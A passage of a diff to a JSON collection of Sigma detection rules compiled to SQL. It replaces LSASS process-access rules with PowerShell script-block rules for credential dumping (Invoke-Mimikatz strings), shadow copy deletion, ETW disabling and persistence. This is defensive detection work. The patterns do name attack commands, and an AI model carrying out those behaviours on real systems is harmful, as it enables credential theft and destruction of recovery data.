ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-smbshare%' ESCAPE '\\')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_susp_smb_share_reco.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", - "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious SSL Connection", + "id": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "status": "test", + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent 
protections provided by a communication protocol.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1573" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Legitimate administrative script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.Security.SslStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.Security.RemoteCertificateValidationCallback%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AuthenticateAsClient%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_susp_ssl_keyword.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", + "id": 
"20e5497e-331c-4cd5-8d36-935f6e2a9a07", "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_invoke_obfuscation_via_compress.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "description": "Uses PowerShell to 
install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1556.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Winlogon Helper DLL", + "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "status": "experimental", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. 
Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_winlogon_helper_dll.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "title": "Service Registry Permissions Weakness Check", + "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ 
- "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_get_acl_service.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. 
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND 
TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1003" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "title": "Suspicious Hyper-V Cmdlets", + "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.defense_evasion", + "attack.t1564.006" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE 
'\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR 
(SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + 
"filename": "posh_ps_susp_hyper_v_condlet.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" - ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" - }, - { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." 
